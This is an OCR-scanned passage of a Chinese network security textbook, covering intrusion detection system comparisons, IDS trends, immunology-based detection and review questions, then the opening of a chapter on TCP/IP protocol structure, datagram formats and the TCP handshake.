力 。 大 部 分 NIDS 的 处 理 能 力 还 是 百 兆 级 别 的 ,部 分 NIDS 已 经 达到 了 千 兆 级 。NIDS 就 
像 设 在 防火 墙 后 面 的 一 个 流动 岗 哨 ,能 够 适时 发 觉 在 网 络 中 的 攻击 行为 ,并 做 出 相应 的 
响应 措施 。 
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3. 性 能 和 效能 的 比较 


HIDS 由 于 采用 的 是 对 事件 和 系统 调用 的 监控 ,衡量 它 的 技术 指标 非常 的 少 ,一般 用 户 
需要 考虑 的 是 ,HIDS 能 够 同时 支持 的 操作 系统 数 、 同 时 监控 的 主机 数 、 探 头 ( 代 理 ) 对 主机 
系统 资源 的 占用 率 和 可 以 分 析 的 协议 数 等 ,另外 也 需要 关注 的 是 分 析 能 力 、 数 据 传输 方式 、 
逐 级 时 间 类 的 数目 .相应 的 方式 和 速度 .自身 的 抗 攻击 能 力 和 日 志 能 力 等 ,一 般 在 采购 
HIDS 产品 时 需要 考察 产品 生产 厂家 的 背景 以 及 在 实际 情况 下 的 攻击 检测 情况 。 

而 NIDS 基本 上 采用 的 是 模式 匹配 的 方式 ,所 以 衡量 NIDS 的 技术 指标 可 以 被 量化 。 
对 于 NIDS 需要 考察 的 是 支持 的 网 络 类 型 .IP 碎片 的 重组 能 力 、 可 分 析 的 协议 数 、 攻 击 特 征 
库 的 数目 、 特 征 库 的 更 新 频率 日志 能 力 ,数据 处 理 能 力 和 自身 抗 攻击 能 力 等 。 尤 其 需要 关 
注 的 是 数据 处 理 能 力 ,一 般 百 兆 级 数据 流量 的 企业 , NIDS 足以 应 对 ; 其 次 是 攻击 特征 库 和 
更 新 频率 的 特性 ,国内 市 场 常 见 的 NIDS 的 攻击 特征 数 大 概 在 1200 个 左右 ,而 更 新 频率 基 
本 上 是 每 个 月 更 新 一 次 ,甚至 每 周 更 新 一 次 。 


10.7 IDS 展望 


目前 基于 网 络 的 IDS 被 人 们 讨论 得 最 多 ,似乎 它 应 该 代表 IDS 的 发 展 潮流 ,但 实际 情 
况 并 非 如 此 。 具 体 原因 有 以 下 几 个 方面 : 

Q@ 所 监控 的 网 络 流量 超过 100Mb/s 之 后 ,IDS 的 计算 量 非常 大 ,系统 的 数据 处 理 与 分 
析 能 力 会 显著 降低 ,这 使 得 基于 网 络 的 IDS 面临 着 一 个 难以 逾越 的 技术 门槛 。 

@ 只 能 监控 明文 格式 数据 流 , 无 法 监控 加 密 数 据 流 ,这 不 能 不 说 是 IDS 的 一 个 硬 伤 。 

通过 对 上 述 分 类 的 分 析 总 结 ,IDS 今后 有 以 下 一 些 发 展 趋势 。 

Qa 检测 模型 走向 自 适应 。 自 适应 模型 结合 了 自学 习 系 统 的 优点 和 特征 系统 的 检测 效 
率 ,这 种 混合 模型 已 经 被 学 术 界 公认 为 发 展 的 热点 。 

@ 体系 结构 从 集中 式 转向 分 布 式 。 传 统 的 集中 存储 模式 ,存在 1/O 瓶颈 容量 扩展 性 
差 、 性 能 不 可 扩展 、. 单 点 故障 等 问题 。 随 着 数据 量 的 增加 ,存储 压力 也 变 得 越 来 越 集中 。 从 
集中 式 转 向 分 布 式 , 使 每 台 服务 器 都 可 以 提供 数据 服务 ,由 应 用 层 来 实现 数据 在 各 个 服 
务 器 集群 之 间 的 迁移 ,从 而 比较 好 地 解决 了 集中 存储 的 W/O 瓶颈 问题 。 但 分 布 式 的 存储 
也 存在 一 些 问题 ,如 没有 负载 均衡 ; 存储 利用 率 相对 较 低 ; 重复 数据 大 量 存在 , 且 份 数 
多 ; 无 法 实现 集中 的 高 Raid 级 别 保护 ; 快照 备份、 恢复 、 远 程 容 灾 比 集中 存储 实现 成 本 
高 等 问题 。 

@ 响应 方式 由 被 动 转向 主动 。 被 动 的 响应 方式 总 是 不 能 及 时 地 对 发 生 的 情况 做 出 响 
应 ,主动 的 响应 方式 能 更 好 地 在 时 间 .速度 上 满足 用 户 的 需要 。 

@ 互 操作 性 蝇 待 提高 。 目 前 ,IDS 的 研究 基本 上 还 处 于 相互 封闭 状态 ,不 同 的 IDS 之 
间 以 及 与 其 他 安全 产品 之 间 的 互 操作 性 很 差 。 为 了 推动 IDS 产品 及 部 件 之 间 的 互 操作 性 ， 
DARPA 和 IETF 入 侵 检测 工作 组 分 别 制定 了 CIDF 和 IDMEF 标准 ,从 体系 结构 、API、 通 
信和 机制 和 语言 格式 等 方面 规范 IDS。 

@ 安全 性 需要 增强 。 作 为 安全 防护 体系 中 的 重要 组 成 部 分 ,IDS 自身 的 安全 性 必须 得 
到 加 强 。 
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目前 IDS 还 处 于 发 展 的 初期 ,国产 IDS 产品 更 是 处 于 特征 检测 的 初级 阶段 ,在 异常 检 
测 和 混合 检测 方面 与 国外 还 存在 相当 大 的 差距 。 


10.8 基于 免疫 学 的 IDS 


生物 体 的 免疫 系统 负责 抵御 外 部 病原 的 人 侵 。 作 为 一 个 信息 处 理 系 统 , 免 疫 系 统 具 有 
以 下 特征 。 

g Self/Nonself 识别 : 识别 系统 中 正常 / 非 正常 模式 。 

@ 噪声 容忍 ( 非 完美 匹配 ) : 能 够 在 噪声 环境 中 进行 识别 。 

@@ 分 布 式 结构 : 使 系统 具有 很 好 的 鲁 棒 性 。 

@ 增强 学 习 : 免疫 系统 具有 学 习 能 力 。 

@ 免疫 记忆 能 力 : 此 能 力 能 有 助 于 免疫 系统 加 速 二 次 免疫 应 答 。 

计算 机 学 者 研究 了 免疫 系统 的 这 些 有 用 特性 ,并 应 用 其 解决 一 些 计 算 机 方面 的 实际 问 
题 ,包括 病毒 检测 、 故 障 诊断 、 防 止 电子 认证 中 的 抵赖 行为 和 网 络 安全 。 在 所 有 的 应 用 领域 
中 ,入 侵 检测 是 最 活跃 的 研究 领域 。 

生物 体 免疫 系统 最 基本 的 功能 是 Self/ Nonself 识别 能 力 。 机 体 连 续 不 断 地 产生 称 做 抗 
体 的 检测 器 细胞 ,并 且 将 其 分 布 到 整个 机 体 中 。 这 些 分 布 式 的 抗体 监视 所 有 的 活性 细胞 , 试 
图 检测 出 入 侵 机 体 的 Nonself 细胞 ,也 就 是 抗原 。 

然而 ,新 生成 的 抗体 不 仅 能 检测 出 入 侵 抗原 ,而 且 还 有 可 能 绑 定 自身 的 Self 细胞 ,发 生 
自 免疫 反应 。 为 了 避免 这 种 灾难 性 后 果 , 机 体 采用 了 负 选 择 过 程 。 在 抗体 生成 时 ,机 体 消除 
那些 绑 定 Self 细胞 的 不 成 熟 抗体 。 对 于 所 有 新 生成 的 抗体 ,只 有 那些 不 绑 定 任何 Self 细胞 
的 抗体 才能 够 成 为 有 效 的 检测 器 细胞 ,分 布 到 机 体 各 部 分 ,行使 检测 权利 。 

将 免疫 学 应 用 于 入 侵 检测 需要 三 个 阶段 : 定义 Self、 生 成 检测 器 和 监视 入侵 。 在 第 一 
个 阶段 ,定义 系统 正常 模式 为 Self。 在 第 二 个 阶段 ,根据 前 面 生 成 的 Self 模式 生成 一 定数 目 
的 随机 模式 (抗原 ) ,如 果 随 机 生成 的 模式 匹配 了 任何 Self 模式 , 则 该 随机 模式 将 不 能 成 为 
检测 器 。 第 二 个 阶段 , 即 监 视 阶段 ,如 果 检 测 器 匹配 任何 新 出 现 的 模式 , 则 被 匹配 的 模式 反 
应 了 系统 可 能 正在 被 入 侵 。 此 时 ,系统 可 以 采取 自动 反应 措施 ,也 可 以 报警 。 

如 果 借 鉴 免疫 系统 中 更 复杂 的 机 制 ,还 可 以 在 检测 器 生成 阶段 和 入 侵 监 视 阶 段 让 检测 
器 进化 ,以 提高 检测 器 的 生成 效率 以 及 检测 效率 ,这 就 需要 采用 遗传 算法 。 


习题 


. 什么 是 入 侵 检测 系统 ? 它 的 主要 功能 有 哪些 ? 包含 哪些 组 件 ? 
. 什么 是 入 侵 行为 ? 

. IDS 监视 的 两 种 主要 类 型 是 什么 ? 

. 两 种 IDS 触发 机 制 是 什么 ? 

. IDS 的 目的 是 什么 ? 

. 什么 是 异常 检测 ? 说 明 异 常 检 测 的 主要 优点 和 缺点 。 

. 什么 是 滥用 检测 ?滥用 检测 的 缺点 是 什么 ? 


A 人 wo- 
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8. 基于 主机 的 IDS 监视 的 主要 缺点 是 什么 ? 

9. 基于 网 络 的 IDS 的 两 个 主要 限制 是 什么 ? 

10. 什么 是 混合 型 IDS? 

11. 基于 特征 的 IDS 有 哪些 优点 ? 

12. 虚假 警报 与 漏 报 的 区 别 是 什么 ? 

13.【 思 考题 如 何 减少 虚假 警报 与 漏 报 对 系统 监控 的 影响 ? 


CHAPTERL 
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通常 的 网 络 攻击 都 是 基于 应 用 层 的 漏洞 或 缺陷 而 产生 的 ,可 是 承接 着 网 
络 通信 的 底层 协议 也 存在 着 一 些 安全 隐患 和 漏洞 ,目前 针对 底层 协议 的 攻击 
也 越 来 越 多 ,网 络 中 这 方面 的 攻击 软件 也 层出不穷 。 

本 章 要 点 如 下 : 

。 TCP/IP 协议 概述 ; 

。 针对 ARP 协议 的 攻击 ; 

。 Dos 攻击 的 原理 和 方法 ; 

。 Dos 攻击 软件 介绍 。 


11.1 TCP/IP 概述 


TCP/IP 是 指 一 整套 数据 通信 协议 ,其 名 字 是 由 这 些 协 议 中 的 两 个 协议 
组 成 的 , 即 传 输 控 制 协 议 (Transmission Control Protocol, TCP) 和 网 间 协 议 


(Internet Protocol,IP) 。 
11.1.1 TCRPIP 的 特点 


TCP/IP 协议 的 主要 特点 如 下 : 
开放 式 协议 标准 : TCP/IP 协议 可 免费 使 用 , 且 与 具体 的 计算 机 硬件 
或 操作 系统 无 关 。 因 此 受到 广泛 的 支持 。 
与 物理 网 络 硬件 无 关 : TCP/IP 协议 可 以 将 很 多 不 同类 型 的 网 络 集成 
在 一 起 , 它 可 以 适用 于 以 太 网 、 令 牌 环 网 、 拨 号 上 网 X. 25 网 络 以 及 任 
何其 他 类 型 的 物理 传输 介质 。 
通用 的 寻 址 方案 : 该 方案 允许 任何 TCP/IP 设备 唯一 地 寻 址 整个 网 
络 中 的 任何 其 他 设备 ,这 使 得 网 络 规模 可 以 像 Internet 一 样 巨大 。 

这 些 特 点 用 以 确保 在 特定 的 时 刻 能 满足 特定 的 需求 , 即 在 任何 网 络 结构 
中 、 任 何 操作 系统 的 计算 机 中 都 能 进行 正常 的 通信 。 
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11.12 OSI 数据 通信 模型 


虽然 OSI 模型 非常 有 用 ,但 TCP/IP 协议 并 不 完全 与 它 的 结构 相 匹 配 。OSI 体系 结构 
定义 如 表 11. 1 所 示 。 
表 11.1 OSI 体系 结构 


协议 层 说 明 

应 用 层 应 用 层 是 网 络 中 与 用 户 访问 有 关 的 协议 层 。TCPVIP 应 用 程序 是 在 运输 层 以 上 发 生 的 
任何 网 络 进程 

表示 层 在 OSI 中 ,这 一 层 可 提供 标准 的 数据 表示 例 程 ,而 在 TCP/IP 中 ,这 种 功能 是 在 应 用 层 
内 处 理 的 

会 话 层 OSI 的 会 话 层 管理 协作 应 用 程序 间 的 会 话 (连接 ) ,在 TCP/IP 中 ,这 一 功能 基本 上 是 在 
运输 层 中 实现 的 ,是 使 用 套 接 字 接口 (socket) 和 端口 (port) 来 说 明 协 作 应 用 程序 间 通 信 
的 路 径 

运输 层 在 OSI 参考 模型 中 ,运输 层 可 以 确保 接收 方正 确 地 接收 到 所 发 出 的 数据 。 在 TCP/IP 


中 ,这 一 功能 是 由 传输 控制 协议 (TCP) 完 成 的 。 而 且 ,TCP/IP 还 提供 了 第 二 种 运输 层 
服务 , 即 用 户 的 数据 报 协议 (UDP) , 它 并 不 执行 端 对 端的 可 靠 性 检查 

网 络 层 网 间 协 议 (IP) 通 常 可 看 作 是 TCP/IP 的 网 络 层 , 它 可 以 将 上 层 与 基本 网 络 隔 离开 ,并 处 
理 寻 址 和 数据 传输 

数据 链 路 层 。 在 基本 的 物理 网 络 上 可 靠 的 传输 数据 是 由 数据 链 路 层 完成 的 。TCP/IP 很 少 创建 数据 
链 路 层 中 的 协议 ,与 数据 链 路 层 有 关 的 大 多 数 RFC 只 讨论 IP 如 何 使 用 现 有 的 数据 链 
路 协议 

物理 层 TCP/IP 不 定义 各 种 物理 标准 , 它 只 使 用 现 有 的 标准 


11.1.3 TCPIP 协议 结构 
在 描述 TCP/IP 时 ,一 般 只 定义 如 图 11. 1 所 示 的 4 层 模型 ,它们 包括 应 用 层 、 运 输 层 、 


网 际 层 和 网 络 接 口 层 。 

在 TCP 的 应 用 层 中 ,将 数据 称 为 “数据 流 (stream)”; 
而 在 用 户 数据 报 协议 CUDP) 的 应 用 层 中 , 则 将 数据 称 为 ee 
“ 报 文 (message)”。 在 TCP 的 运输 层 中 将 TCP 的 数据 结 a 
构 称 作 * 段 (segment)”, 将 UDP 的 数据 结构 称 做 “分 组 
(packet)”。 在 TCP 的 网 际 层 中 则 将 所 有 数据 看 作 是 一 个 ad 
块 , 称 为 “数据 报 (datagram)”。TCP/IP 使 用 很 多 种 不 同 网 络 接口 层 


类 型 的 底层 网 络 , 每 一 种 都 用 不 同 的 术语 定义 它 传输 的 数 
据 ,大 多 数 网 络 将 传输 的 数据 称 为 分 组 或 帧 (frame)。 数 
据 结构 如 图 11. 2 所 示 。 


图 11.1 TCP/IP 协议 结构 
中 的 各 层 


1. 网 络 接口 层 (Network Access Layer) 


网 络 接口 层 是 TCP/IP 协议 结构 的 最 底层 .该 层 中 的 协议 提供 了 一 种 数据 传送 的 方法 ， 
使 得 计算 机 系统 可 以 通过 直接 连接 的 网 络 将 数据 传送 到 其 他 设备 ,并 定义 了 如 何 利用 网 络 
来 传送 数据 报 。 网 络 接口 层 协议 与 较 高 层 协议 不 一 样 . 它 必 须知 道 底 层 网 络 的 各 种 细节 (如 
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11.2 数据 结构 


它 的 分 组 结构 , 寻 址 方式 等 ) ,以 便 准 确 地 格式 化 传输 的 数据 ,使 其 遵守 网 络 规定 。TCP/IP 
网 络 访问 层 可 以 包括 OSI 参考 模型 中 下 三 层 (网 络 层 ,数据 链 路 层 和 物理 层 ) 的 全 部 功能 。 

网 络 访问 协议 种 类 繁多 ,每 一 个 协议 都 对 应 一 种 物理 网 络 标准 。 

该 层 执行 的 功能 包括 将 IP 报 文 封装 成 被 网 络 传输 的 帧 ,并 将 IP 地 址 映射 为 网 络 使 用 
的 物理 地 址 。 

在 UNIX 中 实施 时 ,这 一 层 的 协议 通常 以 设备 驱动 程序 和 有 关 程 序 的 组 合 形式 出 现 。 
这 种 用 网 络 设 备 名 称 标志 的 模块 ,通常 用 来 封装 数据 并 传送 给 网 络 , 而 其 他 程序 则 执行 相关 
功能 ,如 地 址 映射 。 


2. 网 际 层 (Internet Layer) 


网 间 协 议 IP 是 TCP/IP 的 核心 ,也 是 网 际 层 中 最 重要 的 协议 。IP 可 提供 基本 的 分 组 
传输 服务 ,这 是 构建 TCP/IP 网 络 的 基础 。 

(1) 网 间 协 议 (Internet Protocol,IP) 

网 间 协 议 包括 以 下 几 方 面 的 功能 。 

。 定义 数据 报 , 它 是 在 Internet 上 的 基本 传输 单元 。 
定义 网 间 寻 址 方案 。 

。 在 网 络 访问 层 和 主机 对 主机 运输 层 之 间 传 输 数据 。 

。 为 数据 报 选择 至 远程 主机 的 路 由 。 

。 执行 数据 报 的 分 解 和 重组 。 

IP 是 一 个 “无 连接 协议 ”, 主 要 依靠 其 他 层 的 协议 提供 错误 检测 和 错误 恢复 。 有 时 将 
该 网 间 协 议 称 为 “不 可 信 协 议 ”, 因 为 它 并 不 包含 错误 检测 和 恢复 的 程序 代码 。 这 并 不 是 
说 IP 协议 是 不 能 信赖 的 ,恰恰 相反 , 它 可 以 正确 地 将 数据 传送 到 已 连接 的 网 络 ,不 过 它 并 
不 检验 数据 是 否 被 正确 地 接收 ,而 是 在 TCP/IP 结构 中 其 他 层 的 协议 可 以 提供 这 一 检验 
功能 。 

(2) 数据 报 (datagram) 

数据 报 (datagram) 是 网 间 协 议定 义 的 一 种 分 组 格式 。 数 据 报 的 格式 如 图 11. 3 所 示 , 数 
据 报 中 前 5 个 或 6 个 字 为 控制 信息 , 称 为 报头 。 在 默认 情况 下 ,报头 的 长 度 是 5 个 字 , 第 6 
个 字 是 可 选 的 。 由 于 报头 的 长 度 是 可 变 的 ,因而 它 包含 一 个 称 为 “Internet 报头 长 度 
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(IHL)” 的 字段 ,以 字 为 单位 指出 报头 的 长 度 。 报 头 包含 着 传输 该 分 组 所 需 的 全 部 信息 。 


3] 1615 0 
版 本 别 IHL | 服务 类 型 总 长 度 
识别 码 标志 | 片 信 置 量 
寿命 协议 | 报头 校 验 和 报 
源 地 址 ~ 
目的 地 址 
选项 填空 
数据 区 


11.3 IP 数 据 报 的 格式 


网 间 协 议 通过 检查 报头 第 5 个 字 中 的 目的 地 址 (destination address) 传 送 数 据 报 , 该 目 
的 地 址 是 一 个 标准 的 32 位 IP 地址 , 它 可 以 标志 目的 网 络 和 在 该 网 络 上 的 特定 主机 。 如 果 
目的 地 址 是 本 地 网 络 中 一 个 主机 的 地 址 ,该 分 组 就 直接 传送 给 目的 地 ; 如 果 目 的 地 址 不 在 
本 地 网 络 中 ,该 分 组 就 被 传送 到 网 关 (gateway) 再 进行 传送 。 网 关 是 在 不 同 的 物理 网 络 之 间 
交换 分 组 报 文 的 设备 。 确 定 使 用 哪个 网 关 称 为 路 由 选择 (routing) ,IP 为 每 个 单独 的 分 组 作 
出 路 由 选择 决定 。 

(3) 数据 报 的 路 由 选择 

Internet 网 关 通 常 是 指 IP 路 由 器 (router) ,因为 它 使 用 网 间 协 议 在 网 络 之 间 选 择 分 组 
的 路 由 。 在 传统 的 TCP/IP 术语 中 ,只 有 两 种 类 型 的 网 络 设备 , 即 网 关 (gateway) 和 主机 
(host)。 网 关 可 以 在 网 络 之 间 转 发 分 组 报 文 , 主 机 却 不 能 。 如 果 一 台 主 机 连接 多 个 网 络 ( 称 
为 多 地 址 主机 ) , 则 就 可 以 在 网 络 间 转 发 分 组 报 文 。 当 一 个 多 地 址 主机 转发 分 组 报 文 时 , 它 
的 作用 可 以 看 成 是 一 个 网 关 。 目 前 的 数据 通信 术语 有 时 将 网 关 与 路 由 器 区 别 开 , 其 实 “ 网 
关 ” 和 “IP 路 由 器 ?是 可 以 互 换 的 。 

(4) 数据 报 的 拆 分 

每 一 种 类 型 的 网 络 都 有 一 个 “最 大 传输 单元 (MTU)”, 即 网 络 上 可 以 传输 的 最 大 分 组 。 
如 果 从 一 个 网 络 上 接收 到 的 数据 报 大 于 另 一 个 网 络 的 最 大 传输 单元 ,就 必须 将 此 数据 包 拆 
分 成 较 小 的 “ 块 才 能 传输 ,这 一 过 程 称 为 “ 拆 分 (fragmentation)”。 如 以 太 网 与 X. 25 网 络 
在 物理 上 是 不 同 的 。 当 一 个 较 大 的 以 太 网 分 组 在 X. 25 网 络 上 传输 之 前 ,IP 必须 将 它 分 制 
成 较 小 的 分 组 。 

(5) 传送 数据 报到 运输 层 

当 IP 接收 到 一 个 寻 址 本 地 主机 的 数据 报时 , 它 必 须 将 该 数据 报 中 的 数据 部 分 传送 给 合 
适 的 运输 层 协 议 .这 是 利用 数据 报 报 头 中 第 3 个 字 内 的 “协议 号 (Protocol Number)” 完 成 
的 。 每 个 运输 层 协 议 都 有 一 个 唯一 的 协议 号 ,用 来 在 IP 中 标志 自己 。 

(6) 网 间 控 制 报 文 协议 

网 间 控 制 报 文 协议 (Internet Control Message Protocol,ICMP) 是 IP 的 一 个 不 可 分 制 
的 部 分 。 该 协议 是 网 际 层 的 一 部 分 , 它 使 用 IP 数据 报 传输 设施 发 送 报 文 。 它 发 送 的 报 文 可 
以 为 TCP/IP 执行 下 列 控制 错误 报告 ,信息 等 功能 TCP/IP 检测 控制 功能 列表 如 表 11. 2 
所 示 。 
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表 11.2 TCP/IP 检测 控制 功能 列表 


流 控制 当 数据 报到 达 的 速度 太 快 而 无 法 处 理 时 ,目的 主机 或 中 间 网 关 就 会 发 送 一 个 
“ICMP 源 站 抑制 报 文 (ICMP Source Quench Message)" 块 给 发 送 者 ,以 通知 源 站 
暂时 停止 发 送 该 报 文 


检测 不 可 达 的 目的 地 | 当 目的 地 不 可 到 达 时 ,检测 到 该 问题 的 系统 就 发 送 一 个 “目的 地 不 可 达 报 文 
(Destination Unreachable Message)” 给 数据 报 的 源 站 ; 如 果 不 可 达 的 目的 地 是 
一 个 网 络 或 主机 ,就 由 中 间 网 关 发 送 该 报 文 ; 如 果 是 一 个 不 可 达 的 端口 , 则 由 目 
的 地 主机 发 送 该 报 文 

重 定向 路 由 网 关 发 送 “ICMP 重 定向 报 文 (ICMP Redirect Message)” 通 知 主机 使 用 另 一 个 网 
关 , 这 是 因为 另 一 个 网 关 更 合适 。 只 有 当 源 主机 与 这 两 个 网 关 都 在 同一 个 网 络 
上 时 才能 使 用 这 一 报 文 

检查 远程 主机 一 台 主 机 可 以 发 送 *ICMP 回 送 报 文 (ICMP Echo Message)” 以 了 解 远程 系统 的 
网 间 协 议 是 否 正 在 工作 。 当 系统 接收 到 该 回 送 报 文 时 , 便 将 同样 的 分 组 报 文 发 
送 回 源 主机 。UNIX 的 Ping 命令 就 使 用 这 一 报 文 


3. 运输 层 (Transport Layer) 


运输 层 中 两 个 最 重要 的 协议 是 传输 控制 协议 (TCP) 和 用 户 数据 报 协 议 (User Datagram 
Protocol,UDP)。TCP 利用 端 对 端 错误 检测 与 纠正 功能 提供 可 靠 的 数据 传输 服务 ,而 UDP 
提供 低 开销 的 无 连接 数据 报 传输 服务 ,二 者 都 可 以 在 应 用 层 和 网 际 层 之 间 传 输 数 据 。 对 于 
特定 的 应 用 程序 ,程序 开发 人 员 可 以 选择 最 适合 的 传输 协议 。 

(1) 用 户 数据 报 协议 

UDP 是 一 个 不 可 靠 的 无 连接 数据 报 协议 ,其 格式 如 图 11.4 所 示 。 


0 15 16 31(b) 
源 站 端口 


校 验 和 


数据 区 


图 11.4 UDP 的 报 文 格式 


如 果 传 输 的 数据 量 很 少 ,那么 为 建立 连接 和 确保 可 靠 传输 而 花费 的 开销 可 能 比重 新 传 
输 全 部 数据 的 开销 还 要 高 。 在 此 情况 下 ,UDP 就 是 运输 层 协议 最 好 的 选择 。 

使 用 “查询 一 响应 ”方式 的 应 用 程序 也 非常 适合 使 用 UDP 协议 ,其 响应 可 以 用 做 对 查 
询 的 肯定 确认 ,如 果 在 一 定 的 时 间 内 没有 收 到 响应 ,应 用 程序 便 发 出 另 一 个 查询 。 

有 些 应 用 程序 可 提供 自己 的 技术 去 确保 可 靠 的 数据 传输 ,而 不 需要 运输 层 协议 的 服务 。 

(2) 传输 控制 协议 (TCP) 

TCP 是 一 种 可 靠 的 、 面 向 连接 的 、 字 节 流 协议 。TCP 提供 的 可 靠 性 是 利用 一 种 称 为 “ 重 
传 肯 定 确认 (Positive Acknowledgment with Retranmission,PAR)” 机 制 来 实现 的 。 换 句 话 
说 ,除非 一 个 利用 PAR 的 系统 接收 到 从 远 端 系统 发 来 的 肯定 确认 ,否则 就 重 发 源 数 据 。 在 
相互 协作 的 TCP 模块 之 间 交 换 的 数据 单元 称 为 段 (Segment)”,TCP 的 段 格式 如 图 11. 5 
所 示 。 
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31 1615 0 (位 ) 


源 端 品 目的 端口 
序列 号 
确认 号 报 
偏 移 | 保留 | 标志 窗口 关 
校 验 和 紧急 指针 
任 选 填空 
数据 区 


11.5 TCP 的 段 格式 


每 一 段 包含 一 个 校 验 值 ,接收 方 用 它 来 验证 数据 是 否 遭 到 破坏 。 如 果 接 收 到 的 数据 段 
没有 遭 到 破坏 ,接收 者 就 发 送 一 个 肯定 确认 应 答 给 发 送 者 ; 如 果 遭 到 破坏 ,接收 者 就 抛弃 该 
数据 段 。 过 一 段 时 间 后 ,发 送 端 TCP 就 重新 发 送 没有 受到 肯定 确认 的 相应 段 。 

TCP 是 面向 连接 的 , 它 在 两 个 通信 主机 之 间 FE 机 A EB 
建立 一 个 逻辑 的 端 对 端 连接 。 在 传输 数据 之 前 ， 
建立 对 话 的 两 个 端点 之 间 交 换 称 为 握手 的 控制 
信息 。TCP 通过 在 段 头 第 4 个 字 的 标志 字段 中 
设置 相应 的 位 来 表示 一 个 段 的 控制 功能 。TCP 
有 三 次 信息 交换 , 故 称 为 “三 次 握手 ”, 如 图 11. 6 
所 示 。 

主机 A 通过 将 一 个 具有 “同步 序列 号 (SYN)” 11.6 三次 握手 
的 段 发 送 给 主机 B 而 开始 连接 ,该 段 告 诉 主机 
B: 主机 A 希望 建立 连接 并 且 使 用 哪个 序列 号 作为 主机 A 的 段 的 起 始 号 (序列 号 可 用 来 保 
持 数据 的 正确 顺序 ); 主机 B 用 一 个 带 有 “确认 应 答 (ACK)” 和 “同步 序列 号 (SYN)” 位 的 段 
响应 主机 A, 以 确认 收 到 了 A 的 段 ,并 通知 A 它 将 从 哪个 序列 号 开始 ; 最 后 ,A 发 送 一 个 
段 ,确认 收 到 了 B 的 段 ,并 开始 传送 第 一 个 实际 数据 。 

当 协 作 双 方 的 模块 结束 数据 传输 时 ,它们 就 利用 包含 “无 数据 发 送 (FIN)” 位 的 段 来 交 
换 三 次 握手 信息 ,以 关闭 连接 。TCP 协议 在 通信 中 有 以 下 特征 。 

Q@ TCP 发 送 的 是 连续 的 字 节 流 而 不 是 单独 的 分 组 。 

因此 要 确保 发 送 和 接收 的 顺序 , 即 用 TCP 段 头 中 的 “序列 号 "和 “确认 号 ”字段 来 保持 这 
个 顺序 。 

@ 每 个 系统 可 选择 任意 ”号 ”作为 起 点 ,但 通常 情况 下 ISN 总 是 0。 

@ 数据 中 的 每 个 字 节 都 是 从 ISN 开始 顺序 编号 的 ,因而 被 发 送 数据 的 第 一 个 实际 字 节 
的 顺序 号 为 ISN 十 1( 通 常 为 1) 。 

@ 确认 段 (ACK) 执 行 两 种 功能 : 肯定 确认 和 流 控制 。 确 认 就 是 告诉 发 送 者 已 经 接收 
了 多 少数 据 和 接收 方 还 可 以 接收 多 少数 据 。 确 认 号 是 远 端 接收 到 的 最 后 一 个 字 节 的 顺序 
号 。 该 标准 并 不 要 求 每 个 分 组 要 单独 确认 ,确认 号 就 是 对 在 该 号 之 前 的 所 有 字 节 的 肯定 
确认 。 

@ 通过 窗口 字段 的 大 小 控制 远 端 接收 字 节 数 的 能 力 。TCP 数据 流 如 图 11.7 所 示 。 
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1 | iool |2001 |3001 |4001 |5ool |6001 |7001 
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起 始 序号 确认 号 序列 号 4001 
0 2000 


11.7 TCP 数据 流 


TCP 还 负责 将 从 IP 接收 到 的 数据 传送 给 合适 的 应 用 程序 。 接 收 该 数据 的 应 用 程序 是 
用 一 个 16 位 的 “端口 号 ?来 标志 的 。 源 端口 和 目的 端口 包含 在 段 头 的 第 一 个 字 节 中 ,使 数据 
能 够 正确 地 传 进 和 传 出 应 用 层 ,这 是 运输 层 的 一 个 重要 服务 。 


4. 应 用 层 (Application Layer) 


该 层 中 包含 了 使 用 运输 层 协议 传输 数据 的 所 有 协议 ,应 用 层 协 议 很 多 ,一些 著 名 的 应 用 
层 协 议 如 表 11. 3 所 示 。 
表 11.3 应 用 层 协议 列举 表 


应 用 功 能 
TELNET 网 络 终端 协议 ,可 通过 网 络 提供 远程 登录 
FTP 文件 传输 协议 ,可 用 于 交互 式 文件 传输 
SMTP 简单 邮件 传输 协议 ,可 用 于 传送 电子 邮件 
域名 服务 (Domain Name Service,DNS) 将 IP 地 址 映射 成 赋予 网 络 设备 的 名 字 
路 由 信息 协议 (Routing Information Protocol,RIP) ”路 由 选择 是 TCP/IP 的 工作 核心 ,网 络 设备 使 用 
RIP 去 交换 路 由 选择 信息 
网 络 文件 系统 (Network File System,NFS) 允许 文件 被 网 络 上 的 各 种 主机 共享 


综 上 所 述 ,FTP、TELNET 和 SMTP 基本 上 是 依赖 于 TCP 的 ,而 NFS、DNS 和 RIP 则 
基本 上 依赖 于 UDP。 一 些 应 用 程序 型 协议 ,如 外 部 网 关 协 议 (Exterior Gateway Protocol， 
EGP) 是 另 一 个 路 由 协议 ,此 协议 不 使 用 运输 层 服务 ,而 直接 使 用 IP 服务 。 


11.2 数据 传输 概述 


本 节 将 在 了 解 TCP/IP 结构 的 基础 上 ,详细 地 探讨 数据 是 如 何在 网 络 的 协议 之 间 和 系 
统 之 间 传送 的 ,以 及 如 何 利用 地 址 路 由 将 数据 送 到 目的 地 以 及 在 构建 子 网 时 使 用 的 本 地 重 
定义 寻 址 规则 。 


11.21 寻 址 、 路 由 选择 和 多 路 复 用 


为 了 在 两 个 主机 之 间 传 送 数据 ,就 必须 通过 网 络 将 数据 传送 给 相应 的 主机 ,并 在 该 主机 
内 传送 给 相应 的 用 户 或 进程 。TCP/IP 利用 三 种 方法 来 完成 这 些 任 务 , 具 体 传送 数据 的 方 
法 如 表 11.4 所 示 。 


第 11 章 网 络 协议 的 缺陷 和 安全 技 


表 11.4 TCP/IP 传送 数据 的 方法 


方 法 解 释 
寻 址 (Addressing) IP 地 址 可 以 唯一 地 标志 Internet 中 的 每 一 台 主 机 , 它 可 以 将 数据 传送 到 相 
应 的 主机 
路 由 选择 (Routing) 网 关 可 以 将 数据 传送 到 相应 的 网 络 


多 路 复 用 (Multiplexing) ”协议 和 端口 号 可 以 将 数据 传送 到 主机 内 相应 的 软件 模块 


每 一 个 功能 (在 主机 之 间 寻 址 在 网 络 之 间 选 择 路 由 和 在 层 间 多 路 复 用 ) 对 于 通过 
Internet 在 两 个 协作 应 用 程序 间 传 送 数据 都 是 必须 的 。 


11.22 IP 地 址 


网 间 协 议 (IP) 以 数据 报 的 形式 在 主机 之 间 传 输 数据 ,每 个 数据 报 传送 到 一 个 地 址 ,该 地 
址 包含 在 该 数据 报 报头 的 目的 地 址 (第 5 个 字 ) 中 。 目 的 地 址 是 一 个 32 位 的 IP 地址, 它 包 
